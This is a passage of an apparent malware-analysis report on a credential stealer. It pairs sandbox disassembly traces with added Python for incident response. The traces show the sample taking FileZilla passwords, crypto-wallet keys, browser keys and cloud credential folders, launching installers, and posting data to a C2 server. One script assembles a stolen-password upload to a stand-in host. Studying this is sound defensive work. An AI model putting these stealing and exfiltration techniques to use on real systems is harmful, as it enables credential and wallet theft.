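STEALER_PASS_TAG = '<Pass encoding="base64">'


def default_recentservers_path():
    """Path the trace builds: %APPDATA% resolves to <profile>\\AppData\\Roaming on Windows."""
    appdata = os.environ.get("APPDATA", os.path.join("~", "AppData", "Roaming"))
    return os.path.join(os.path.expanduser(appdata), "FileZilla", "recentservers.xml")


def exposed_filezilla_entries(xml_text):
    """One dict per <Server>: what a stealer reading this file would obtain."""
    root = ET.fromstring(xml_text)
    entries = []
    for server in root.iter("Server"):
        pass_el = server.find("Pass")
        has_pass = pass_el is not None and bool((pass_el.text or "").strip())
        encoding = pass_el.get("encoding") if pass_el is not None else None
        entries.append({
            "host": server.findtext("Host", default=""),
            "port": server.findtext("Port", default=""),
            "login": server.findtext("User", default=""),
            "password_stored": has_pass,
            # True only for the exact tag the sample searches for
            "matched_by_literal_search": has_pass and encoding == "base64",
        })
    return entries


def literal_search_hits(xml_text):
    """Mirror the sample's approach: count raw occurrences of its <Pass> literal."""
    return xml_text.count(STEALER_PASS_TAG)


def rotation_list(xml_text):
    """Credentials to rotate: every entry that had a password on disk."""
    return [f"{e['login']}@{e['host']}:{e['port']}"
            for e in exposed_filezilla_entries(xml_text) if e["password_stored"]]


if __name__ == "__main__":
    print("would read:", default_recentservers_path())
    for entry in exposed_filezilla_entries(SAMPLE_RECENTSERVERS):
        print(entry)
    print("rotate:", rotation_list(SAMPLE_RECENTSERVERS))
```

Run it against a copy of the victim's `recentservers.xml` (and `sitemanager.xml`, which uses the same `<Server>` layout) by passing the file contents to `exposed_filezilla_entries`; anything in `rotation_list` should be treated as compromised regardless of whether the literal search would have matched, since other stealer builds may search differently.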
                  APIs
                    • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                    • Part of subcall function 00D347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D34839
                    • Part of subcall function 00D347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00D34849
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00D359F8
                  • StrCmpCA.SHLWAPI(?,00AFE9F8), ref: 00D35A13
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D35B93
                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00AFEA38,00000000,?,00AFA4B0,00000000,?,00D51A1C), ref: 00D35E71
                  • lstrlen.KERNEL32(00000000), ref: 00D35E82
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00D35E93
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D35E9A
                  • lstrlen.KERNEL32(00000000), ref: 00D35EAF
                  • lstrlen.KERNEL32(00000000), ref: 00D35ED8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00D35EF1
                  • lstrlen.KERNEL32(00000000,?,?), ref: 00D35F1B
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00D35F2F
                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00D35F4C
                  • InternetCloseHandle.WININET(00000000), ref: 00D35FB0
                  • InternetCloseHandle.WININET(00000000), ref: 00D35FBD
                  • HttpOpenRequestA.WININET(00000000,00AFEA08,?,00AFE218,00000000,00000000,00400100,00000000), ref: 00D35BF8
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                  • InternetCloseHandle.WININET(00000000), ref: 00D35FC7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 874700897-2180234286
                  • Opcode ID: b5e0907a984053859dec3409c9791a0d83beff4487d75be37836d987c30af90f
                  • Instruction ID: f59f2884a2a78976414007f452cb29721616c2151e422e9bb89067594897d0a8
                  • Opcode Fuzzy Hash: b5e0907a984053859dec3409c9791a0d83beff4487d75be37836d987c30af90f
                  • Instruction Fuzzy Hash: 14121271860128ABEB15EBA4DC96FEEB378FF54700F514199B50A62091DF702A4ACF72
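The routine above is the sample's HTTP transport: InternetOpenA, InternetCrackUrlA on the C2 URL, InternetConnectA with dwService 3 (INTERNET_SERVICE_HTTP), HttpOpenRequestA with flags 0x00400100 (INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE), HttpSendRequestA, and InternetReadFile in 0xC7-byte reads. The body is assembled by repeated lstrcat calls whose fixed pieces are `"` and `------`, which are the quoting and dash runs of a multipart/form-data body. The Python below is an added example, not code from the report or from the sample: it builds such a body the same incremental way (the `--` boundary prefix, a Content-Disposition line with quoted `name=` and `filename=` attributes, a blank line, the data, the closing `--`) and parses a captured POST back into its parts, which is what a responder does with a C2 request carved from a capture to see what was uploaded. The host, path, boundary, field names and payload are constructed for the example; the sample's real values are not visible in the trace.

```python
import re

# Constructed request pieces, as a responder might carve them from a capture.
# Host, path, boundary, field names and payload are made up for this example.
SAMPLE_HOST = b"c2.example.test"
SAMPLE_PATH = b"/gate"
SAMPLE_BOUNDARY = b"------Boundary7d2a9f"
SAMPLE_FIELDS = [
    # (name, filename or None, content_type or None, data)
    (b"token", None, None, b"a1b2c3"),
    (b"file", b"passwords.txt", b"application/octet-stream",
     b"browser: FileZilla\r\nprofile: null\r\nurl: ftp.example.test\r\n"
     b"login: deploy\r\npassword: hunter2\r\n"),
]


def build_multipart_body(fields, boundary):
    """Assemble a multipart/form-data body piece by piece, the way the lstrcat
    sequence in the trace does: '--' + boundary, a Content-Disposition line with
    quoted attributes, an optional Content-Type, a blank line, the data, and a
    final '--' + boundary + '--' terminator."""
    out = bytearray()
    for name, filename, ctype, data in fields:
        out += b"--" + boundary + b"\r\n"
        out += b'Content-Disposition: form-data; name="' + name + b'"'
        if filename is not None:
            out += b'; filename="' + filename + b'"'
        out += b"\r\n"
        if ctype is not None:
            out += b"Content-Type: " + ctype + b"\r\n"
        out += b"\r\n" + data + b"\r\n"
    out += b"--" + boundary + b"--\r\n"
    return bytes(out)


def build_request(host, path, fields, boundary):
    """Complete HTTP/1.1 POST with the multipart body and matching Content-Type."""
    body = build_multipart_body(fields, boundary)
    head = (b"POST " + path + b" HTTP/1.1\r\n"
            b"Host: " + host + b"\r\n"
            b"Content-Type: multipart/form-data; boundary=" + boundary + b"\r\n"
            b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n")
    return head + body


_ATTR = re.compile(rb'(\w+)="([^"]*)"')


def parse_multipart_request(raw):
    """Split a captured POST into parts: [{name, filename, content_type, data}]."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no header/body separator")
    m = re.search(rb'boundary="?([^";\r\n]+)"?', head, re.I)
    if not m:
        raise ValueError("no multipart boundary in Content-Type")
    delim = b"--" + m.group(1)          # delimiter line is '--' + boundary
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):
            break                       # closing delimiter reached
        if chunk.startswith(b"\r\n"):
            chunk = chunk[2:]
        hdrs, _, data = chunk.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):
            data = data[:-2]            # CRLF before the next delimiter
        attrs, ctype = {}, None
        for line in hdrs.split(b"\r\n"):
            key, _, val = line.partition(b":")
            if key.lower() == b"content-disposition":
                attrs = {k.decode(): v.decode() for k, v in _ATTR.findall(val)}
            elif key.lower() == b"content-type":
                ctype = val.strip()
        parts.append({"name": attrs.get("name"), "filename": attrs.get("filename"),
                      "content_type": ctype, "data": data})
    return parts


def summarize_parts(parts):
    """Triage view: (name, filename, size) for each uploaded part."""
    return [(p["name"], p["filename"], len(p["data"])) for p in parts]


if __name__ == "__main__":
    req = build_request(SAMPLE_HOST, SAMPLE_PATH, SAMPLE_FIELDS, SAMPLE_BOUNDARY)
    for row in summarize_parts(parse_multipart_request(req)):
        print(row)
```

The parser deliberately tolerates a missing Content-Length and an unquoted boundary, both of which are common in hand-rolled malware uploads; feed it the raw request bytes reassembled from the TCP stream rather than a decoded view, since the delimiter match is byte-exact.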
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                    • Part of subcall function 00D48B60: GetSystemTime.KERNEL32(00D50E1A,00AFA690,00D505AE,?,?,00D313F9,?,0000001A,00D50E1A,00000000,?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D48B86
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D3CF83
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00D3D0C7
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D3D0CE
                  • lstrcat.KERNEL32(?,00000000), ref: 00D3D208
                  • lstrcat.KERNEL32(?,00D51478), ref: 00D3D217
                  • lstrcat.KERNEL32(?,00000000), ref: 00D3D22A
                  • lstrcat.KERNEL32(?,00D5147C), ref: 00D3D239
                  • lstrcat.KERNEL32(?,00000000), ref: 00D3D24C
                  • lstrcat.KERNEL32(?,00D51480), ref: 00D3D25B
                  • lstrcat.KERNEL32(?,00000000), ref: 00D3D26E
                  • lstrcat.KERNEL32(?,00D51484), ref: 00D3D27D
                  • lstrcat.KERNEL32(?,00000000), ref: 00D3D290
                  • lstrcat.KERNEL32(?,00D51488), ref: 00D3D29F
                  • lstrcat.KERNEL32(?,00000000), ref: 00D3D2B2
                  • lstrcat.KERNEL32(?,00D5148C), ref: 00D3D2C1
                  • lstrcat.KERNEL32(?,00000000), ref: 00D3D2D4
                  • lstrcat.KERNEL32(?,00D51490), ref: 00D3D2E3
                    • Part of subcall function 00D4A820: lstrlen.KERNEL32(00D34F05,?,?,00D34F05,00D50DDE), ref: 00D4A82B
                    • Part of subcall function 00D4A820: lstrcpy.KERNEL32(00D50DDE,00000000), ref: 00D4A885
                  • lstrlen.KERNEL32(?), ref: 00D3D32A
                  • lstrlen.KERNEL32(?), ref: 00D3D339
                    • Part of subcall function 00D4AA70: StrCmpCA.SHLWAPI(00AF8FF8,00D3A7A7,?,00D3A7A7,00AF8FF8), ref: 00D4AA8F
                  • DeleteFileA.KERNEL32(00000000), ref: 00D3D3B4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                  • String ID:
                  • API String ID: 1956182324-0
                  • Opcode ID: a1cbafe99150af8c2f8ddfa9662bc0ae378ad510c56adb00aebe15902f35313b
                  • Instruction ID: 7d46167fd5de3d703ee042b840827eca6166c8be5be809d63a0df021ce106846
                  • Opcode Fuzzy Hash: a1cbafe99150af8c2f8ddfa9662bc0ae378ad510c56adb00aebe15902f35313b
                  • Instruction Fuzzy Hash: C9E16B72850108ABEB04EBA4DD96EEE7378FF58301F114158F506B2091EE34AE4ADB73
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00AFD3E0,00000000,?,00D5144C,00000000,?,?), ref: 00D3CA6C
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00D3CA89
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00D3CA95
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D3CAA8
                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00D3CAD9
                  • StrStrA.SHLWAPI(?,00AFD200,00D50B52), ref: 00D3CAF7
                  • StrStrA.SHLWAPI(00000000,00AFD218), ref: 00D3CB1E
                  • StrStrA.SHLWAPI(?,00AFDA40,00000000,?,00D51458,00000000,?,00000000,00000000,?,00AF8FC8,00000000,?,00D51454,00000000,?), ref: 00D3CCA2
                  • StrStrA.SHLWAPI(00000000,00AFDBE0), ref: 00D3CCB9
                    • Part of subcall function 00D3C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00D3C871
                    • Part of subcall function 00D3C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00D3C87C
                  • StrStrA.SHLWAPI(?,00AFDBE0,00000000,?,00D5145C,00000000,?,00000000,00AF8FE8), ref: 00D3CD5A
                  • StrStrA.SHLWAPI(00000000,00AF91C8), ref: 00D3CD71
                    • Part of subcall function 00D3C820: lstrcat.KERNEL32(?,00D50B46), ref: 00D3C943
                    • Part of subcall function 00D3C820: lstrcat.KERNEL32(?,00D50B47), ref: 00D3C957
                    • Part of subcall function 00D3C820: lstrcat.KERNEL32(?,00D50B4E), ref: 00D3C978
                  • lstrlen.KERNEL32(00000000), ref: 00D3CE44
                  • CloseHandle.KERNEL32(00000000), ref: 00D3CE9C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                  • String ID:
                  • API String ID: 3744635739-3916222277
                  • Opcode ID: 4593bedbba6156624a2912639046376800787040004d00db04344ae4c76fd370
                  • Instruction ID: 0ca7525d997da6b052d9da62189320141f446e2f654f7d485cdcc9097c6a357c
                  • Opcode Fuzzy Hash: 4593bedbba6156624a2912639046376800787040004d00db04344ae4c76fd370
                  • Instruction Fuzzy Hash: FDE1FB71950108ABEB15EBA8DC92FEEB778EF54300F414159F50676191EF306A8ACF72
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                  • RegOpenKeyExA.ADVAPI32(00000000,00AFB148,00000000,00020019,00000000,00D505B6), ref: 00D483A4
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00D48426
                  • wsprintfA.USER32 ref: 00D48459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00D4847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 00D4848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 00D48499
                    • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                  Strings
                  Yara matches
                  Similarity
                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                  • String ID: - $%s\%s$?
                  • API String ID: 3246050789-3278919252
                  • Opcode ID: 3622df9801609cbcb1c1256ab7457576f9fab7b42c8ad82fa9b8ab2390fa08dc
                  • Instruction ID: 624158d252c0dd665538311b2a6484ee3a063de433ea5c616cf7b73fe393cff7
                  • Opcode Fuzzy Hash: 3622df9801609cbcb1c1256ab7457576f9fab7b42c8ad82fa9b8ab2390fa08dc
                  • Instruction Fuzzy Hash: 5D81D97195011CABEB68DB54CC95FEEB7B8FF48700F008299E509A6180DF716A89DFB1
                  APIs
                    • Part of subcall function 00D48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D48E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00D44DB0
                  • lstrcat.KERNEL32(?,\.azure\), ref: 00D44DCD
                    • Part of subcall function 00D44910: wsprintfA.USER32 ref: 00D4492C
                    • Part of subcall function 00D44910: FindFirstFileA.KERNEL32(?,?), ref: 00D44943
                  • lstrcat.KERNEL32(?,00000000), ref: 00D44E3C
                  • lstrcat.KERNEL32(?,\.aws\), ref: 00D44E59
                    • Part of subcall function 00D44910: StrCmpCA.SHLWAPI(?,00D50FDC), ref: 00D44971
                    • Part of subcall function 00D44910: StrCmpCA.SHLWAPI(?,00D50FE0), ref: 00D44987
                    • Part of subcall function 00D44910: FindNextFileA.KERNEL32(000000FF,?), ref: 00D44B7D
                    • Part of subcall function 00D44910: FindClose.KERNEL32(000000FF), ref: 00D44B92
                  • lstrcat.KERNEL32(?,00000000), ref: 00D44EC8
                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00D44EE5
                    • Part of subcall function 00D44910: wsprintfA.USER32 ref: 00D449B0
                    • Part of subcall function 00D44910: StrCmpCA.SHLWAPI(?,00D508D2), ref: 00D449C5
                    • Part of subcall function 00D44910: wsprintfA.USER32 ref: 00D449E2
                    • Part of subcall function 00D44910: PathMatchSpecA.SHLWAPI(?,?), ref: 00D44A1E
                    • Part of subcall function 00D44910: lstrcat.KERNEL32(?,00AFEA18), ref: 00D44A4A
                    • Part of subcall function 00D44910: lstrcat.KERNEL32(?,00D50FF8), ref: 00D44A5C
                    • Part of subcall function 00D44910: lstrcat.KERNEL32(?,?), ref: 00D44A70
                    • Part of subcall function 00D44910: lstrcat.KERNEL32(?,00D50FFC), ref: 00D44A82
                    • Part of subcall function 00D44910: lstrcat.KERNEL32(?,?), ref: 00D44A96
                    • Part of subcall function 00D44910: CopyFileA.KERNEL32(?,?,00000001), ref: 00D44AAC
                    • Part of subcall function 00D44910: DeleteFileA.KERNEL32(?), ref: 00D44B31
                  Strings
                  Yara matches
                  Similarity
                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                  • API String ID: 949356159-974132213
                  • Opcode ID: cf373ba4606ec2f31ece4068a743adb11ac3b5327e884ae35d3ec754caf43ae4
                  • Instruction ID: 2ff1fcbf9fc548b3af6c3b4fb9c824916f6cb2cb7a11e8a2d2315c3ab4b6378b
                  • Opcode Fuzzy Hash: cf373ba4606ec2f31ece4068a743adb11ac3b5327e884ae35d3ec754caf43ae4
                  • Instruction Fuzzy Hash: B14181BA9802186BDB50F760EC47FED3238EB64705F004494B989660C1EEB45BCD8BB3
                  APIs
                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00D4906C
                  Strings
                  Yara matches
                  Similarity
                  • API ID: CreateGlobalStream
                  • String ID: image/jpeg
                  • API String ID: 2244384528-3785015651
                  • Opcode ID: 66aa825dcaeeef74d3dd7408409f40339c72198b63bc5629636ff4380fae1a8c
                  • Instruction ID: 467379f12379f439309b1d0b38984706b9e439c126810e1446879a4cf97d29ae
                  • Opcode Fuzzy Hash: 66aa825dcaeeef74d3dd7408409f40339c72198b63bc5629636ff4380fae1a8c
                  • Instruction Fuzzy Hash: 8371DB75910208ABDB04EFE4DC99FEEB7B8EB88700F148508F519A7290DB74A945DB72
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00D431C5
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00D4335D
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00D434EA
                  Strings
                  Yara matches
                  Similarity
                  • API ID: ExecuteShell$lstrcpy
                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                  • API String ID: 2507796910-3625054190
                  • Opcode ID: 4d7cdd88a1996e290bef2fd469bc420f04a680bfe1234de91362a1dc86e2ed5f
                  • Instruction ID: f21428f49cd7ef8bf7c952c14d72570fda4a7d71f9ac2778a600bf3aa4f9a5ed
                  • Opcode Fuzzy Hash: 4d7cdd88a1996e290bef2fd469bc420f04a680bfe1234de91362a1dc86e2ed5f
                  • Instruction Fuzzy Hash: D812E971850118ABEB19EBA4DC92FEEB738EF14300F504159F50666192EF746B4ACFB2
                  APIs
                    • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                    • Part of subcall function 00D36280: InternetOpenA.WININET(00D50DFE,00000001,00000000,00000000,00000000), ref: 00D362E1
                    • Part of subcall function 00D36280: StrCmpCA.SHLWAPI(?,00AFE9F8), ref: 00D36303
                    • Part of subcall function 00D36280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D36335
                    • Part of subcall function 00D36280: HttpOpenRequestA.WININET(00000000,GET,?,00AFE218,00000000,00000000,00400100,00000000), ref: 00D36385
                    • Part of subcall function 00D36280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00D363BF
                    • Part of subcall function 00D36280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D363D1
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D45318
                  • lstrlen.KERNEL32(00000000), ref: 00D4532F
                    • Part of subcall function 00D48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D48E52
                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00D45364
                  • lstrlen.KERNEL32(00000000), ref: 00D45383
                  • lstrlen.KERNEL32(00000000), ref: 00D453AE
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                  Strings
                  Yara matches
                  Similarity
                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 3240024479-1526165396
                  • Opcode ID: f9d394346da9a61b27e6dc90b18fcd0c7c2f75ca9a6e242df39dba7c075629ba
                  • Instruction ID: db742756c067be906b402c84c2cb48c1267ddaf385a297090853795064b9ea47
                  • Opcode Fuzzy Hash: f9d394346da9a61b27e6dc90b18fcd0c7c2f75ca9a6e242df39dba7c075629ba
                  • Instruction Fuzzy Hash: FD513F309501489BEB18FF68DD92AED7779EF50305F504018F80A6B192DF34AB4ACB72
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen
                  • String ID:
                  • API String ID: 2001356338-0
                  • Opcode ID: 97b92f4273af14ead1476e847cd141901aa44bd70087cf9ef87866bbfd9cc62d
                  • Instruction ID: 1c5a8e199403a114301fd0741e5bbf6f3171dd33c8ddf75abd813af74fe1704e
                  • Opcode Fuzzy Hash: 97b92f4273af14ead1476e847cd141901aa44bd70087cf9ef87866bbfd9cc62d
                  • Instruction Fuzzy Hash: 39C170B594021D9BCB14EF60DC89FEE7378FB64304F004598E50AA7241EA74EA85DFB2
                  APIs
                    • Part of subcall function 00D48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D48E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00D442EC
                  • lstrcat.KERNEL32(?,00AFE320), ref: 00D4430B
                  • lstrcat.KERNEL32(?,?), ref: 00D4431F
                  • lstrcat.KERNEL32(?,00AFD260), ref: 00D44333
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D48D90: GetFileAttributesA.KERNEL32(00000000,?,00D31B54,?,?,00D5564C,?,?,00D50E1F), ref: 00D48D9F
                    • Part of subcall function 00D39CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00D39D39
                    • Part of subcall function 00D399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D399EC
